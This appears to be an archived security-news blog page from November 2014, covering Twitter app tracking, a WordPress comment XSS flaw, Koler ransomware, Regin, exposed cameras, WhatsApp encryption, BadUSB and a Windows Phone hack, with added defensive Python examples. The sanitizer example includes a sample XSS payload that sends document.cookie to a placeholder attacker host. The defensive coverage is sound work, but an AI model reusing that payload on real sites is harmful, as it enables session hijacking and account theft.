::Trend Micro Threat Resource Center::

28 November 2014

Twitter to start snooping on which apps you have installed - here's how to opt out


Twitter is set to start peeking at users' iPhones, iPads and Androids in order to see which apps they have downloaded.

The company will start collecting the list of apps installed on those smartphones and tablets so that it can, in its own words, "deliver tailored content that you might be interested in."

A support article says the additional data collection will allow Twitter to make better recommendations on who to follow, as well as insert content it thinks you will find interesting into your feed.

The new feature, which Twitter has named "app graph," could tie in with the company's recently announced Instant Timeline feature which takes new users' areas of interest and the people their contacts follow, and serves up a feed created for them in order to better personalise Twitter from day one.

By collecting data about other installed apps, the feature would be better positioned to create a more relevant starting timeline.

Of course, the main benefit to Twitter will be the ability to use the collected information to surface more targeted adverts. Or, as Twitter puts it, show you more promoted content it "think[s] you'll find especially interesting."

Twitter says it will only record the list of apps you have installed, not how they are used.

So, for example, Twitter will be able to see that you have Spotify on your phone, but not that you're listening to the same 80s classic over and over and over again.

While users are entered into the new tracking system automatically, with collection turned on by default, Twitter has promised to alert them when the feature is switched on for their account.

We will notify you about this feature being turned on for your account by showing a prompt letting you know that to help tailor your experience, Twitter uses the apps on your device. Until you see this prompt, this setting is turned off and we are not collecting a list of your apps.

If you don't want your apps to be snapped up by Twitter's data gobblers, here's how to turn it off:

Twitter for Android
  1. Tap the overflow icon (looks like 3 vertical dots)
  2. Choose Settings.
  3. Select your account
  4. Under Other, turn off Tailor Twitter based on my apps.

Twitter for iOS
  1. Tap the Me tab, and then the gear icon
  2. Choose Settings
  3. Select your account
  4. Under Privacy, turn off Tailor Twitter based on my apps.

Once you opt out, Twitter says it will remove your app graph data from Twitter and stop future collection. If you don't yet see the option, Twitter won't have started tracking you yet.

If you want to stop the collection before it's started, Twitter says you can turn on Limit Ad Tracking on your iOS device by going to Settings, then Privacy.

If you're an Android user, go to Settings, tap the Google account, choose Ads and then turn on Opt out of interest-based ads.

26 November 2014

Layers and Protocols of Internet of Everything Devices


We see the ‘cool’ when we wear or operate our smart TVs and watches and all other smart devices we own. But are we aware of how the data is processed in these devices? And where does the data we get or the data that these devices transmit end up?

Most, if not all, smart devices are connected to the Internet, which is where the data we send and receive over them ends up being stored. Before it gets there, the data passes through several layers:

  1. Link layer – where the smart devices send and share the data. In this layer, the data is shared among devices via Wi-Fi, Ethernet, RFID, and Bluetooth protocols, among others.
  2. Router layer – can also be referred to as the Smart Hub layer. It is the device that connects all of your smart devices to the Internet.
  3. Session layer – when you use apps on your smart devices (think FitBit as an example), the data sent and received through these apps is managed in this layer. HTTP and HTTPS are the best-known protocols used in this layer.
  4. Internet layer – can also be called the Cloud layer. This is where the data ends up. If you use apps that have equivalent Web-based login pages (take fitness monitoring apps such as Runtastic, for example), you’ll see the 101 steps you recorded ‘pushed’ to your Web profile almost immediately.

Now there is nothing wrong with the way smart devices and the Internet link together. It’s perfectly fine save for one thing: there are risks. The Internet layer, where the data is stored, is a highly likely target for attack. Password-based attacks – guessing passwords, brute force attacks – can be used to access the Internet layer and steal data. Changing the data that passes through the Session layer by way of man-in-the-middle (MITM) attacks is also possible. Attacks on the Link layer, while difficult and low-yield, are also likely.

Be on the safe and smart side of smart devices. There is an infographic Layers and Protocols: Possible Attacks on the Internet of Everything that will walk you through the risks and suggests protection measures you need to know and implement.


25 November 2014

Four-year-old comment security bug affects 86 percent of WordPress sites

A Finnish IT company has uncovered a bug in WordPress 3 sites that could be used to launch a wide variety of malicious script-based attacks on site visitors’ browsers. Based on current WordPress usage statistics, the vulnerability could affect up to 86 percent of existing WordPress-powered sites.


The vulnerability, discovered by Jouko Pynnonen of Klikki Oy, allows an attacker to craft a comment on a blog post that includes malicious JavaScript code. On sites that allow comments without authentication—the default setting for WordPress—this could allow anyone to post malicious scripts within comments that could target site visitors or administrators. A proof of concept attack developed by Klikki Oy was able to hijack a WordPress site administrator’s session and create a new WordPress administrative account with a known password, change the current administrative password, and launch malicious PHP code on the server. That means an attacker could essentially lock the existing site administrator out and hijack the WordPress installation for malicious purposes.

“For instance, our [proof of concept] exploits first clean up traces of the injected script from the database,” the Klikki Oy team wrote in a blog post on the vulnerability, “then perform other administrative tasks such as changing the current user's password, adding a new administrator account, or using the plugin editor to write attacker-supplied PHP code on the server (this impact applies to any WordPress XSS if triggered by an administrator). These operations happen in the background without the user seeing anything out of the ordinary. If the attacker writes new PHP code on the server via the plugin editor, another AJAX request can be used to execute it instantaneously, whereby the attacker gains operating system level access on the server.”

The current version of WordPress (version 4.0), which was released in September, is not vulnerable to the attack. However, WordPress issued a security update to version 4.0 last week to address unrelated cross-site scripting issues.
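As an added illustration, not code from WordPress, Klikki Oy or this article, the pattern behind a stored comment XSS is shown below beside a hardened renderer in Python. The first function inserts the saved comment into the page verbatim; the second rebuilds it through an allowlist so that `<script>` bodies, event-handler attributes and `javascript:` links never reach the browser, while the basic formatting commenters expect is kept. The allowlist, the sample comment and the attacker.example placeholder are the example's own assumptions, and it demonstrates generic output sanitization rather than the specific WordPress 3 flaw, whose mechanics the article does not give.

```python
import html
from html.parser import HTMLParser

# Tags a comment may keep, with the attributes allowed on each. This allowlist is an
# assumption for the example; it is not WordPress's own comment filter configuration.
ALLOWED_TAGS = {"b": set(), "i": set(), "em": set(), "strong": set(), "a": {"href"}}
SAFE_URL_SCHEMES = ("http://", "https://")
RAW_TEXT_TAGS = {"script", "style"}  # their bodies are dropped, not merely their tags


class CommentSanitizer(HTMLParser):
    """Rebuilds comment markup, keeping only allowlisted tags and attributes.

    Dropped tags, event-handler attributes and non-http(s) URLs never reach the
    page; all text is emitted HTML-escaped, so nothing stored can execute.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitized fragments, joined at the end
        self.open_tags = []  # stack used to keep the output well-formed
        self.skip_depth = 0  # >0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return  # <img onerror=...>, <iframe>, <svg> and friends are discarded
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue  # onclick=, style=, a bare href, etc.
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_SCHEMES):
                continue  # blocks javascript:, data: and vbscript: URLs
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if tag not in ALLOWED_TAGS or tag not in self.open_tags:
            return
        while self.open_tags:  # close intermediate tags so nesting stays valid
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if self.skip_depth == 0:
            self.out.append(html.escape(data, quote=False))

    def result(self):
        self.close()
        while self.open_tags:  # close anything the commenter left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def render_comment_unsafe(comment):
    """Vulnerable pattern: stored comment text placed into the page verbatim."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    """Hardened pattern: the comment is sanitized on output, so a stored payload stays inert."""
    sanitizer = CommentSanitizer()
    sanitizer.feed(comment)
    return f'<p class="comment">{sanitizer.result()}</p>'


# Constructed comment of the kind described above: benign formatting mixed with a
# script and a javascript: link. attacker.example is a placeholder, not a real host.
SAMPLE_COMMENT = (
    "Great post! <b>Thanks</b> "
    "<script>new Image().src='http://attacker.example/?c='+document.cookie</script> "
    '<a href="javascript:alert(1)">click</a> <a href="https://example.com">source</a>'
)

if __name__ == "__main__":
    print(render_comment_unsafe(SAMPLE_COMMENT))
    print(render_comment_safe(SAMPLE_COMMENT))
```

Plain escaping alone would have been enough to neutralise the script, but it would also turn every commenter's `<b>` into literal text; an allowlist rebuilt from a real parser, rather than a regex over the raw string, is the usual compromise, and it also repairs the unbalanced tags that attackers use to break out of the surrounding markup.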

24 November 2014

Android ransomware 'Koler' turns into a worm, spreads via SMS


A malicious Android app that takes over the screen of devices and extorts money from users with fake notifications from law enforcement agencies was recently updated with a component that allows it to spread via text message spam.

Known as Koler, the ransomware Trojan has been on malware researchers' radar since May when it started being distributed through porn websites under the guise of legitimate apps. A new variant of the threat found recently by researchers from security firm AdaptiveMobile spreads through SMS messages that attempt to trick users into opening a shortened bit.ly URL.

Once installed on a device, Koler opens a persistent window that covers the entire screen and displays a fake message from local law enforcement agencies accusing users of viewing and storing child pornography. Victims are asked to pay a "fine" using MoneyPak prepaid cards in order to regain control of their phones.

The Koler ransomware is capable of displaying localized ransomware messages to users from at least 30 countries, including the U.S., where the impersonated law enforcement agency is the FBI.

The new version found by AdaptiveMobile sends a text message to all contacts in the victim's address book. The message reads: "someone made a profile named -[the contact's name]- and he uploaded some of your photos! is that you?" followed by a bit.ly URL or a similar shortened link.


The URL points to an Android application package file called IMG_7821.apk that's hosted on a Dropbox account. When installed, this application uses the name PhotoViewer, but is actually the ransomware program.
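The lure text and link pattern quoted above are enough for an operator- or device-management-side detection rule. As an added example, not from AdaptiveMobile or this article, the Python below scores each message against the quoted lure phrases and common URL shorteners, then flags senders whose lure messages fan out to many distinct recipients, which is the worm behaviour (one handset texting its whole address book) rather than a single forwarded message. The indicator lists, the sample log, the phone numbers and the shortened-link placeholder are constructed for the example.

```python
import re
from collections import defaultdict

# Phrases from the lure text quoted in the article, plus common URL shorteners. Real
# deployments would maintain these as tunable indicator lists; these are the example's.
LURE_PHRASES = (
    re.compile(r"made a profile named", re.I),
    re.compile(r"uploaded some of your photos", re.I),
)
SHORTENER_RE = re.compile(r"https?://(?:bit\.ly|goo\.gl|tinyurl\.com|t\.co)/\S+", re.I)
NAME_SLOT_RE = re.compile(r"-[^-]{1,40}-")  # the "-<contact name>-" slot in the lure


def score_message(text):
    """Return the indicator names one SMS body matches (empty list = nothing suspicious)."""
    reasons = []
    if any(p.search(text) for p in LURE_PHRASES):
        reasons.append("koler_lure_text")
    if SHORTENER_RE.search(text):
        reasons.append("shortened_url")
    return reasons


def template_of(text):
    """Collapse the per-recipient name and the link so fan-out copies compare equal."""
    text = NAME_SLOT_RE.sub("-<NAME>-", text)
    text = SHORTENER_RE.sub("<URL>", text)
    return " ".join(text.lower().split())


def detect_koler_senders(log, min_recipients=3):
    """Flag senders that push the lure template to many distinct recipients.

    `log` is an iterable of (timestamp, sender, recipient, text) tuples. A single
    lure-like message is only a hint; the decision is made on per-sender fan-out.
    """
    per_sender = defaultdict(lambda: {"recipients": set(), "templates": set(), "reasons": set()})
    for _ts, sender, recipient, text in log:
        reasons = score_message(text)
        if "koler_lure_text" not in reasons:
            continue
        entry = per_sender[sender]
        entry["recipients"].add(recipient)
        entry["templates"].add(template_of(text))
        entry["reasons"].update(reasons)
    return {
        sender: {
            "recipients": len(e["recipients"]),
            "templates": len(e["templates"]),
            "reasons": sorted(e["reasons"]),
        }
        for sender, e in per_sender.items()
        if len(e["recipients"]) >= min_recipients
    }


def _lure(name):
    # Constructed copy of the lure; the link is a placeholder, not a live URL.
    return (f"someone made a profile named -{name}- and he uploaded some of your photos! "
            f"is that you? http://bit.ly/PLACEHOLDER")


# Constructed operator-side SMS log: fictitious numbers, one infected handset, two benign senders.
SAMPLE_SMS_LOG = [
    ("2014-10-20T09:00:01Z", "+15550100", "+15550201", _lure("Alice")),
    ("2014-10-20T09:00:02Z", "+15550100", "+15550202", _lure("Bob")),
    ("2014-10-20T09:00:02Z", "+15550100", "+15550203", _lure("Carol")),
    ("2014-10-20T09:00:03Z", "+15550100", "+15550204", _lure("Dave")),
    ("2014-10-20T09:05:00Z", "+15550300", "+15550201", "running late, see you at 7"),
    ("2014-10-20T09:06:00Z", "+15550400", "+15550205", "worth a read: http://bit.ly/PLACEHOLDER"),
]

if __name__ == "__main__":
    for sender, info in detect_koler_senders(SAMPLE_SMS_LOG).items():
        print(sender, info)
```

Only the sender blasting the lure to four contacts is reported; the benign shortened link from a second sender scores one indicator but never reaches the fan-out threshold, which keeps ordinary link sharing out of the alert queue.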

Because of Worm.Koler's SMS distribution mechanism, a rapid spread of infected devices has been observed since the 19th of October, which is believed to be the original outbreak date.

During this short period, several hundred phones that exhibit signs of infection have been detected across multiple US carriers. In addition, other mobile operators worldwide, predominantly in the Middle East, have been affected by this malware.

The best protection against ransomware threats like Koler is to have the "unknown sources" option turned off in the Android security settings menu. When this setting is disabled -- and it typically is by default -- users won't be able to install applications that are not obtained from the official Google Play store. Some users do turn this option on though, because there are legitimate applications that are not hosted on Google Play for various reasons.

Koler does not encrypt users’ files, so it is easy to eliminate from infected devices. The instructions to remove the malware are:
  • Reboot the mobile device in “Safe Mode”.
  • Remove the malicious ‘PhotoViewer’ app using the standard Android app uninstallation tool.

Instructions on how to reboot the device in safe mode should be available in the phone's manual, but it generally involves pressing and holding the power button until the power menu appears, then tapping and holding Power Off until the option to reboot in safe mode appears.

As of 24 Nov, this worm has reached the shores of Singapore, as reported in a popular local forum.


23 November 2014

Symantec Uncovers Sophisticated, Stealthy Computer Spying Tool

Computer security researchers at Symantec say they have discovered a sophisticated piece of malware circulating the world that appears to be used for spying at Internet service and telecommunications companies, and was likely created by a government agency. And while its origin is unclear, a short list of capable countries would include the U.S., Israel and China.


The research, published today, comes from the same team at Symantec that four years ago helped discover and ferret out the capabilities of Stuxnet, the world’s first digital weapon. It is believed to have been created by the combined efforts of the U.S. and Israel and used to sabotage the Iranian nuclear research program.

The team has dubbed this newly found Trojan “Regin” according to a Symantec blog post, and they are describing it as a “complex piece of malware whose structure displays a degree of technical competence rarely seen.” They say the tool has an “extensive range of capabilities” that provides the people controlling it with “a powerful framework for mass surveillance.”

The researchers said Regin has been used in what appears to be an ongoing spying operation that started in 2008, stopped suddenly in 2011, and then resumed in 2013.

The campaign was carried out against government organizations, businesses, researchers and private individuals. About 100 Regin infections have been detected, the researchers said, with most — a combined 52 percent — in Russia and Saudi Arabia. The remainder have occurred in Mexico, Ireland, India, Afghanistan, Iran, Belgium, Austria and Pakistan. No infections have yet been detected in the U.S. or China.

Symantec was first made aware of Regin after customers discovered parts of it and sent the code for analysis. “We realized there was more to what was sent us than was readily apparent and went back to investigate further,” said Liam O’Murchu, one of the researchers. Symantec security software can now detect it, he said.

The quality of Regin’s design and the investment required to create it is such that it was almost certainly made by a nation-state, said O’Murchu. But asked to speculate which nation-state, he demurred. “The best clues we have are where the infections have occurred and where they have not,” he said in an interview with Re/code. “We know it was a government that is technically advanced. … This has been a huge spying campaign dating back at least to 2008 and maybe even as early as 2006.”

It doesn’t take much of a leap to wonder out loud if the U.S. National Security Agency or the Central Intelligence Agency, perhaps working with Israel, might be the source, especially given the list of countries targeted. However, there are other possible sources, including China.

There is still a lot about Regin that’s not known. (And for more technical detail on what is known, there’s a 21-page white paper here.) There are pieces of it, O’Murchu said, that haven’t yet been found and examined. But here’s what is understood so far:

Regin attacks systems running Microsoft Windows. It attacks in stages and requires five pieces. Only the first stage is detectable; it opens the door for the subsequent stages, each of which decrypts and executes the following stage. In this way it’s similar to Stuxnet and its sibling Trojan, Duqu, which was designed to gather intelligence on a target by stealing massive amounts of data.

Nearly half of all Regin infections occurred at Internet service providers, the targets being the customers of those companies. Other companies attacked included telecom providers, hospitality companies, energy companies, airlines and research organizations.

How the malware spreads is also a mystery. In one case — but only one — the infection was carried out by way of Yahoo Instant Messenger. In other cases, Symantec believes victims were tricked into visiting spoofed versions of well-known websites. “Other than that one example, we have no firm information on how it has been distributed,” O’Murchu said.

Once a computer has been compromised, Regin’s controllers can load it up with whatever payload is needed to carry out the spying operation. Said Symantec: “Some custom payloads are very advanced and exhibit a high degree of expertise in specialist sectors,” say, something that’s specifically geared toward spying on an airline or an energy company. This is “further evidence of the level of resources available to Regin’s authors,” the company said.

There are dozens of these payloads. One seen in several cases is a remote access tool, or RAT, which gives an attacker the ability to take control of a computer remotely — copy files from the hard drive, turn on the Web cam, turn on the microphone. RATs are also good for capturing keystrokes, a good way to steal passwords. Some of the more advanced payloads seen on machines compromised by Regin include software to monitor network traffic and a tool to manage mobile phone base stations.

Exceptional effort was made by its creators to prevent Regin and its communications to its handlers from being detected. “Even when its presence is detected, it is very difficult to ascertain what it is doing,” said Symantec.

Several pieces of Regin are still circulating and are as yet undiscovered, O’Murchu said. He hopes that with the publication of Symantec’s findings, more information from other researchers will come to light.

22 November 2014

If You Didn’t Change The Default Password On Your Security Camera, Someone’s Probably Watching It Stream

Remote access has been a boon to many industries. Home security cameras, for example: not only can you keep an eye on your property in case anything bad happens, but you can do it in real-time, instead of reviewing footage after the fact. But cameras protecting the security of your home may in fact need a serious security helper of your own. And running tens of thousands of searchable livestreams from unwitting camera owners who didn’t change the default access passwords on their devices is certainly one (unethical, intrusive) way to make the point.

One site does exactly that, as Vice reported recently. The site runs live streams of feeds from tens of thousands of IP cameras around the world.


Users buy the devices — think nanny cams, baby monitors, and home security — to keep an eye on their families, valuables, and property. But with poor security practices, anyone and everyone else can keep an eye on your goods, too.


Cameras designed to be accessed remotely, as these are, have passwords. And they ship with default passwords that users are supposed to change during set-up. Only, many users don’t. (Even when they do, admittedly, people are often objectively terrible at passwords.) That makes it easy for someone with an idea for a website to come along and write a script that looks for cameras on the internet, then tries the default password on them and adds the feed to a public collection if that password works.

Despite running ads and generating revenue, security is the real point the site is making, its owner told Vice. “Most people still do not know about the problem,” they wrote in an e-mail, and so nobody has yet asked to have their camera removed from the collection. “Only [the website] can prove the scale of the problem,” the administrator added. “This problem was in darkness for many years.”

Vice then goes on to look at how ethical hackers — the so-called “white hat” set — expose software vulnerabilities and then share their information with the companies that made the vulnerable products. It’s a common pastime for network security experts and for security companies. (When done by the latter, it’s not entirely altruistic: if you can point out a security hole, you can point out the need for someone to buy your services to fix it.)

The person or group behind this particular website, Vice concludes, isn’t exactly one of the good guys; they’re doing something both illegal and unethical. But this particular camera-sharing website, though troubling, isn’t really the root problem. It’s just one symptom of a massive, much larger, much deeper issue.

As everything gets “smart,” mobile, remote-accessible, and connected, security becomes an ever-deeper challenge. Sophisticated hackers will probably always be able to break their way into certain lucrative systems, just as criminals will always try to rob physical banks. But millions of cracks, hacks, and break-ins aren’t even the purview of sophisticated hacking operations: they’re just the result of plain bad security that end-users — we home consumers — didn’t even know needed fixing. It’s not about how to protect your bank vault from Bonnie and Clyde; it’s about knowing the cash should go in a vault in the first place, and not simply be left in piles on the lawn.

Commandeered cameras are incredibly intrusive, but as far as poor default security goes, they’re only the tip of the iceberg.

Every wifi router ships with a default password, and it’s super easy to look those up by make and model. Securing your router, on the other hand, takes more work.

Your remotely-accessible multifunction printer might use a weak default password or in fact not have a password at all, meaning anyone with know-how could get in. Like a wandering security expert who hacks it to run video games… or someone less ethical, installing something worse as a gateway to the whole network.

A common default password can get you into a cash-filled ATM, where you could presumably then commit actual bank robbery.

At least, though, we all have a vague association with “network” and “security” when it comes to our routers, even if we’re bad at implementing it, and we know that banks need strong network security to protect their customers and their transactions. But security applies to everything that uses an internet connection.

From heating to cooling, homes are getting ever more connected. When your whole house goes smart, Bradbury-style, that means your whole house is vulnerable. Last year, one Forbes contributor explained how she was able to access everything from televisions to light switches to hot tubs in complete strangers’ homes.

Home appliances — from TVs to refrigerators — have already been unwitting participants in spam-sending botnets. Spam e-mail is annoying but comparatively harmless. Future intrusions, though, might not be.

Any company making connected devices that can receive, transmit, or share data needs to be stepping up their security game. Anything and everything should clearly require passwords and should require on first use that owners change those passwords to something reasonably secure, for a start.
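As an added example, not code from any camera vendor or from this article, here is the first-use rule the paragraph asks for, written in Python: a device model that keeps remote access disabled until the factory password has been replaced, and that rejects replacements which are the factory value, a commonly shipped default, too short, or built from the model or serial number. The default list, the length floor, the PBKDF2 parameters and the device identifiers are the example's assumptions.

```python
import hashlib
import hmac
import secrets

# Illustrative set of credentials commonly shipped as factory defaults. A real product
# would carry a much longer, maintained list; this one is an assumption for the example.
KNOWN_DEFAULTS = {"", "admin", "password", "1234", "12345", "123456", "root", "user", "guest"}
MIN_LENGTH = 12
PBKDF2_ROUNDS = 200_000


class Device:
    """A connected device that refuses remote access until its factory password is replaced."""

    def __init__(self, model, serial, factory_password):
        self.model = model
        self.serial = serial
        self._factory_password = factory_password
        self._salt = None
        self._hash = None
        self.factory_default_in_use = True

    def password_problems(self, candidate):
        """Why `candidate` is unacceptable as the owner's new password; empty list = acceptable."""
        problems = []
        lowered = candidate.lower()
        if candidate == self._factory_password:
            problems.append("factory_default")
        if lowered in KNOWN_DEFAULTS:
            problems.append("known_default")
        if len(candidate) < MIN_LENGTH:
            problems.append("too_short")
        if self.model.lower() in lowered or self.serial.lower() in lowered:
            problems.append("contains_device_identifier")  # printed on the label, so guessable
        return problems

    def authenticate(self, password):
        if self.factory_default_in_use:
            return hmac.compare_digest(password.encode(), self._factory_password.encode())
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), self._salt, PBKDF2_ROUNDS)
        return hmac.compare_digest(digest, self._hash)

    def change_password(self, current, new):
        """Replace the credential. Returns the problems found; the change happened only if empty."""
        if not self.authenticate(current):
            return ["wrong_current_password"]
        problems = self.password_problems(new)
        if problems:
            return problems
        self._salt = secrets.token_bytes(16)
        self._hash = hashlib.pbkdf2_hmac("sha256", new.encode(), self._salt, PBKDF2_ROUNDS)
        self.factory_default_in_use = False
        return []

    def remote_access_allowed(self):
        """The gate the article asks for: no Internet-facing stream while the default is in use."""
        return not self.factory_default_in_use


if __name__ == "__main__":
    cam = Device("CAM-1000", "SN-EXAMPLE-0001", "admin")  # constructed identifiers
    print("remote access before setup:", cam.remote_access_allowed())
    print("problems with 'admin':", cam.change_password("admin", "admin"))
    print("problems with a real passphrase:", cam.change_password("admin", "correct horse battery staple"))
    print("remote access after setup:", cam.remote_access_allowed())
```

Returning the list of problems rather than a bare True/False lets the set-up screen tell the owner exactly what to fix, and keeping the remote-access gate tied to the stored state (not to a separate flag the UI sets) means a device that skips the wizard still never appears on the Internet with `admin` as its password.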

But until then, the burden remains on individuals. Any time you buy or install a device that in any way connects to the internet? Look up how to keep it secure. And use a good password when you do.

20 November 2014

WhatsApp Messenger Adds End-to-End Encryption by Default

Good news for all privacy lovers! Finally the wildly popular messaging app WhatsApp has made end-to-end encryption a default feature, taking a step forward for the online privacy of its users around the world.


WhatsApp, the most popular messaging app with 600 million users as of October 2014, has partnered with Open Whisper Systems to boost its privacy and security by implementing strong end-to-end encryption on all text messages.

The strong end-to-end encryption here means that even Mark Zuckerberg himself can't pry into your conversations, even if asked by law enforcement officials. The app maker describes this move as the "largest deployment of end-to-end encryption ever."

Open Whisper Systems is a non-profit software organisation started by security researcher Moxie Marlinspike, who is behind the development of the TextSecure encrypted messaging app. Over the past three years, his team has been developing a 'modern, open source, strong encryption protocol' for messaging services, which is now being incorporated into WhatsApp.

A simplified picture of how OTR protocol works, courtesy of WhisperSystems

There are some limits to WhatsApp's end-to-end encryption: so far it only works on the Android platform (with iOS coming soon) and covers only one-to-one messages, not group messages. Also, the app is still open to potential man-in-the-middle (MitM) attacks because there's no way to check or verify the identity of the person you are messaging.
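To show why the missing identity check matters, here is an added illustration, not WhatsApp's or Open Whisper Systems' code and not their protocol: a toy Diffie-Hellman exchange in Python with an optional attacker on the path, plus a key-fingerprint comparison that models the out-of-band verification step the paragraph says is absent. Without verification the attacker ends up holding a separate shared key with each side and can read and re-encrypt everything; when fingerprints have been compared beforehand, the substituted key is rejected before any message is sent. The group parameters are deliberately tiny and insecure, and the fingerprint format is the example's own.

```python
import hashlib
import secrets

# Toy Diffie-Hellman parameters so the exchange runs instantly and is easy to follow.
# 2^31 - 1 is prime but far too small for real use; this is illustration, not a secure group.
P = 2_147_483_647
G = 7


def keypair():
    priv = secrets.randbelow(P - 2) + 1   # private exponent in [1, P-2]
    return priv, pow(G, priv, P)          # (private, public)


def shared_secret(priv, peer_pub):
    return pow(peer_pub, priv, P)


def fingerprint(pub):
    """Short, human-comparable digest of a public key (illustrative format, not WhatsApp's)."""
    digest = hashlib.sha256(pub.to_bytes(8, "big")).hexdigest()
    return " ".join(digest[i:i + 4] for i in range(0, 24, 4))


def simulate(mitm, verify_fingerprints):
    """Run one key exchange between Alice and Bob.

    mitm=True puts Mallory on the path, replacing each party's public key with her own.
    verify_fingerprints=True models the out-of-band check: before trusting a received
    key, each side compares its fingerprint with one obtained directly from the peer.
    """
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    # Fingerprints exchanged out of band (in person, over a call) before the chat starts.
    trusted = {"alice": fingerprint(a_pub), "bob": fingerprint(b_pub)}

    if mitm:
        m_priv, m_pub = keypair()
        key_alice_receives, key_bob_receives = m_pub, m_pub
    else:
        key_alice_receives, key_bob_receives = b_pub, a_pub

    if verify_fingerprints and (fingerprint(key_alice_receives) != trusted["bob"]
                                or fingerprint(key_bob_receives) != trusted["alice"]):
        # The key on the wire is not the one the peer showed us directly: abort.
        return {"detected": True, "keys_match": False, "mallory_reads": False}

    alice_key = shared_secret(a_priv, key_alice_receives)
    bob_key = shared_secret(b_priv, key_bob_receives)
    mallory_reads = False
    if mitm:
        # Mallory derives one key with Alice (g^(am)) and another with Bob (g^(bm)), so
        # she can decrypt, read and re-encrypt everything that passes between them.
        mallory_reads = (shared_secret(m_priv, a_pub) == alice_key
                         and shared_secret(m_priv, b_pub) == bob_key)
    return {"detected": False, "keys_match": alice_key == bob_key, "mallory_reads": mallory_reads}


if __name__ == "__main__":
    for mitm in (False, True):
        for verify in (False, True):
            print(f"mitm={mitm!s:5} verify={verify!s:5} ->", simulate(mitm, verify))
```

The exchange itself is the same in all four runs; the only thing that changes the outcome is whether the parties had a way to recognise each other's keys, which is exactly the gap the article describes.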

WhatsApp was bought by Facebook for $19 billion in February. The popular app has been criticized over the years for a series of security and privacy issues. But after the announcement of this rollout, it has been praised over the internet by security folks.

Other encrypted messaging apps do exist currently, including Cryptocat, Silent Text and Telegram, but according to The Verge, WhatsApp will be the largest to implement this type of end-to-end encryption ever.

Open Whisper Systems is a company built from open source contributors and a dedicated team to advance "state of the art" secure communication, and is best known as the developer of the Signal, Redphone, and TextSecure apps.

19 November 2014

The Hacker’s New Best Friend Could be Your USB Port

It’s tiny and portable, yet perfect for storing large items. I’m talking about the good ol’ Universal Serial Bus (a.k.a. USB) drive, the giveaway of choice at tradeshows across the world, and perfect for the easy storage and transfer of photos, documents, music and more. But you might want to think twice before plugging a free USB into your machine. The reason: USBs can now contract an undetectable - and unfixable - virus that can be spread quite easily.


News of this potent malicious software (often referred to as malware) has circled around the information security industry since researchers Karsten Nohl and Jakob Lell described their new attack to a packed room at this year’s Black Hat security conference in early August.

The malware, dubbed BadUSB, can take over a computer, as well as redirect Internet-bound traffic to a different site. But BadUSB’s danger doesn’t lie with its ability to execute code—this type of malware, called auto-run (because it runs automatically when the USB drive is inserted into your device), has been around for some time now. The danger lies with its ability to never be detected. BadUSB exploits how the USB standard was built and coded, and mixes malware with the device’s firmware—the code that tells the USB stick how to work. This intermingling of code makes the malware indistinguishable from normal, safe firmware.

Because of the danger this particular form of malware posed to the public at large, the pair refrained from releasing the code to attendees. That reasoning, however, didn’t sit well with another pair of researchers, who did publish the infectious malware after reverse engineering it. The malware that freaked out two security researchers enough to make them refrain from publishing their work is now out in the open.

USBs, long considered secure (perhaps incorrectly), are now major liabilities to consumers everywhere. So the question now is, should you be worried?

The answer is yes and no.

The good thing about this malware variant is that it’s isolated to just USB devices. But that’s also its danger: USB devices are so ubiquitous that consumers typically don’t pay them any attention—the best sort of attack vector hackers could hope for. Hackers could also hide this malware within a larger package and could, theoretically, infect a computer that would subsequently infect any and all USB devices that connect with that machine—thereby spreading the malware even further. All in all it’s pretty bad news.

So why did these researchers knowingly, and publicly, publish such dangerous malware? Because they want to see this security issue fixed, and the only way they’re convinced it’ll be fixed is by lighting a fire under USB manufacturers.

They’re not entirely wrong, either. Manufacturers, largely for business reasons, have been notoriously slow in fixing security issues (called patching), and USB drives are no different. By publicly making this code available, the pair of researchers will deny USB manufacturers the ability to claim that they weren’t aware of security vulnerabilities on USB. That knowledge, it’s theorized, will drive better security further down the road.

Publishing this code was well intentioned, and, truthfully, is a fairly standard practice in the information security industry. But this particular malware is going to cause a lot of headaches for quite a few years (likely a decade). So what can you do to protect yourself while this newfound attack vector is out in the wild? Well there are a few options available:
  • Use caution with free USB drives.
    A lot of companies like to go to major conferences and events and hand out free USB drives. This is bad security practice. Free USBs have always carried the risk of being preloaded with malware, and now the risk has doubled. You don’t have to turn down free USB drives, but you do have to be conscious of the risk you’re running when you don’t know where that USB has been. If you’re uncertain if a USB is safe, run a scan.
  • Lock down your computers.
    USBs have long been a reliable method of compromising computers. All it takes is an unknowing person to plug a USB drive into a port, and the damage is done. Never leave your computer sitting out in a public place where someone could access your USB port.
  • Use comprehensive security.
    Between USB devices, computers and mobile phones - all the technology we own is a security risk. So how can you minimize the likelihood of getting infected by malware? By using a comprehensive security service, which provides a comprehensive shield against malware, phishing attacks and a variety of other nasties aimed at compromising your digital life. Such software also automatically scans USBs when they’re connected to your computer, for known malware. This is a step you cannot afford to skip in the protection of your valuable information.

18 November 2014

Windows Phone 8.1 Hacked


Do you want to hack a Nokia Lumia phone running the latest mobile operating system, Windows Phone 8.1? Hackers have made it very easy for you all!

Just a few weeks after Microsoft announced that a 19-year-old critical security hole existed in almost every version of its Windows operating system, XDA Developers have discovered a new vulnerability in Microsoft’s youngest OS, Windows Phone 8.1, that could easily be exploited by hackers to hack a Nokia Lumia phone.

An XDA Developers hacker who goes by the name DJAmol has found a wide-open hole in Windows Phone 8.1 which makes the operating system very easy to hack. The vulnerability allows attackers to run their application with another user's privileges and edit the registry.

DJAmol realized that simply by replacing the contents of a trusted OEM app that has been transferred over to the SD card, the app will inherit the privileges of the original app. Once done, an attacker could then delete the existing directory and create a new directory with the same name as the original App.

